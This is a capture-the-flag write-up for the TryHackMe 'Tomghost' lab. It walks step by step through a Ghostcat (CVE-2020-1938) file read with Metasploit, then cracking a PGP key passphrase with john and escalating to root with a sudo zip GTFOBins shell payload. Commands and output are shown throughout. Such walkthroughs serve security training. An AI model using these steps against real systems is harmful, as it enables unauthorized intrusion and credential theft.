Tomghost

Tomghost is a linux machine which is rated easy by TryHackMe. This machine covers vulnerability on the Tomcat apache server and privilege escalation on a different user on the box. I’ll have to remove the flags and passwords…

Network scanning

The machine IP address is 10.10.68.255 and we shall start by scanning it by using nmap.

Command: nmap -sC -sV -oA initial 10.10.68.255

└─$ nmap -sC -sV -oA initial 10.10.68.255 
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-20 11:58 EAT
Nmap scan report for 10.10.68.255
Host is up (0.17s latency).
Not shown: 996 closed tcp ports (conn-refused)
PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 f3c89f0b6ac5fe95540be9e3ba93db7c (RSA)
|   256 dd1a09f59963a3430d2d90d8e3e11fb9 (ECDSA)
|_  256 48d1301b386cc653ea3081805d0cf105 (ED25519)
53/tcp   open  tcpwrapped
8009/tcp open  ajp13      Apache Jserv (Protocol v1.3)
| ajp-methods: 
|_  Supported methods: GET HEAD POST OPTIONS
8080/tcp open  http       Apache Tomcat 9.0.30
|_http-favicon: Apache Tomcat
|_http-title: Apache Tomcat/9.0.30
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 120.12 seconds

Enumeration

There is a website running on port 8080. We notice it is Apache Tomcat version 9.0.30. If we google some of the vulnerabilities which affected that version we get File upload vulnerability CVE-2020-1938. Now lets launch Metaslpoit and search it.

msf6 > search CVE-2020-1938

Matching Modules
================

   #  Name                                  Disclosure Date  Rank    Check  Description
   -  ----                                  ---------------  ----    -----  -----------
   0  auxiliary/admin/http/tomcat_ghostcat  2020-02-20       normal  Yes    Apache Tomcat AJP File Read


Interact with a module by name or index. For example info 0, use 0 or use auxiliary/admin/http/tomcat_ghostcat

Use the exploit which we have found.

use auxiliary/admin/http/tomcat_ghostcat

Then set the RHOSTS to our machine’s IP address.

msf6 auxiliary(admin/http/tomcat_ghostcat) > set rhosts 10.10.68.255
rhosts => 10.10.68.255

Once you have set the rhosts you can now exploit the system by using run or exploit

msf6 auxiliary(admin/http/tomcat_ghostcat) > run
[*] Running module against 10.10.68.255
Status Code: 200
Accept-Ranges: bytes
ETag: W/"1261-1583902632000"
Last-Modified: Wed, 11 Mar 2020 04:57:12 GMT
Content-Type: application/xml
Content-Length: 1261
<?xml version="1.0" encoding="UTF-8"?>
<!--
 Licensed to the Apache Software Foundation (ASF) under one or more
  contributor license agreements.  See the NOTICE file distributed with
  this work for additional information regarding copyright ownership.
  The ASF licenses this file to You under the Apache License, Version 2.0
  (the "License"); you may not use this file except in compliance with
  the License.  You may obtain a copy of the License at

      http://www.apache.org/licenses/LICENSE-2.0

  Unless required by applicable law or agreed to in writing, software
  distributed under the License is distributed on an "AS IS" BASIS,
  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
  See the License for the specific language governing permissions and
  limitations under the License.
-->
<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee"
  xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
  xsi:schemaLocation="http://xmlns.jcp.org/xml/ns/javaee
                      http://xmlns.jcp.org/xml/ns/javaee/web-app_4_0.xsd"
  version="4.0"
  metadata-complete="true">

  <display-name>Welcome to Tomcat</display-name>
  <description>
     Welcome to GhostCat
	skyfuck:I_HAVE_REMOVED_THE_PASSWORD
  </description>

</web-app>
msf6 auxiliary(admin/http/tomcat_ghostcat) >

You will find the username and the password on the description tag. You can also find this file here: /home/{YOUR_USERNAME}/.msf4/loot/20230420121725_default_10.10.68.255_WEBINFweb.xml_167447.txt

Initial Foothold

Since we have the username and password we can ssh into the machine.

└─$ ssh skyfuck@10.10.68.255

lets cat the user flag

skyfuck@ubuntu:~$ cat /home/merlin/user.txt 
THM{I_HAVE_REMOVED_THE_FLAG}

If we go to the home directory, we find two files:

skyfuck@ubuntu:~$ ls
credential.pgp  tryhackme.asc

Lets copy the files to our machine so as we can crack the credential.gpg

└─$ scp skyfuck@10.10.68.255:/home/skyfuck/* .
skyfuck@10.10.68.255's password: 
credential.pgp                                    100%  394     0.9KB/s   00:00    
tryhackme.asc

We shall use John to crack the password meaning we have to use gpg2john so as we have it’s hash to crack it.

└─$ gpg2john tryhackme.asc > hash

Now fire up john and let it do its thing.

└─$ john --wordlist=/usr/share/wordlists/rockyou.txt hash 
Using default input encoding: UTF-8
Loaded 1 password hash (gpg, OpenPGP / GnuPG Secret Key [32/64])
Cost 1 (s2k-count) is 65536 for all loaded hashes
Cost 2 (hash algorithm [1:MD5 2:SHA1 3:RIPEMD160 8:SHA256 9:SHA384 10:SHA512 11:SHA224]) is 2 for all loaded hashes
Cost 3 (cipher algorithm [1:IDEA 2:3DES 3:CAST5 4:Blowfish 7:AES128 8:AES192 9:AES256 10:Twofish 11:Camellia128 12:Camellia192 13:Camellia256]) is 9 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
I_HAVE_REMOVED_THE_PASSWORD        (tryhackme)     
1g 0:00:00:00 DONE (2023-04-20 12:37) 1.923g/s 2061p/s 2061c/s 2061C/s theresa..alexandru
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

Nice… We have the password of the gpg file so lets first import it.

skyfuck@ubuntu:~$ gpg --import tryhackme.asc 
gpg: key C6707170: secret key imported
gpg: /home/skyfuck/.gnupg/trustdb.gpg: trustdb created
gpg: key C6707170: public key "tryhackme <stuxnet@tryhackme.com>" imported
gpg: key C6707170: "tryhackme <stuxnet@tryhackme.com>" not changed
gpg: Total number processed: 2
gpg:               imported: 1
gpg:              unchanged: 1
gpg:       secret keys read: 1
gpg:   secret keys imported: 1

Once we have imported it we are going to decrypt the gpg.

skyfuck@ubuntu:~$ gpg --decrypt credential.pgp 

You need a passphrase to unlock the secret key for
user: "tryhackme <stuxnet@tryhackme.com>"
1024-bit ELG-E key, ID 6184FBCC, created 2020-03-11 (main key ID C6707170)

gpg: gpg-agent is not available in this session
gpg: WARNING: cipher algorithm CAST5 not found in recipient preferences
gpg: encrypted with 1024-bit ELG-E key, ID 6184FBCC, created 2020-03-11
      "tryhackme <stuxnet@tryhackme.com>"
merlin:I_HAVE_REMOVED_THE_PASSWORD
skyfuck@ubuntu:~$

Wooah… We have found another user and the password.

Privilege Escalation

Lets login in his account and find our way to being the root.

└─$ ssh merlin@10.10.68.255
merlin@10.10.68.255's password: 
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.4.0-174-generic x86_64)

By running sudo -l we see that the /usr/bin/zip can be ran by this user with root privilege.

merlin@ubuntu:~$ sudo -l
Matching Defaults entries for merlin on ubuntu:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User merlin may run the following commands on ubuntu:
    (root : root) NOPASSWD: /usr/bin/zip
merlin@ubuntu:~$

So lets go to gtfobins and find our payload to use. Link

merlin@ubuntu:~$ TF=$(mktemp -u)
merlin@ubuntu:~$ sudo zip $TF /etc/hosts -T -TT 'sh #'
  adding: etc/hosts (deflated 31%)
# id
uid=0(root) gid=0(root) groups=0(root)
#

We have root soo lets get our flag and get out of here.

# cat /root/root.txt
THM{I_HAVE_REMOVED_THE_FLAG}
#

If you have any other additional information and resources you can add it at the comment section. THANKS ;)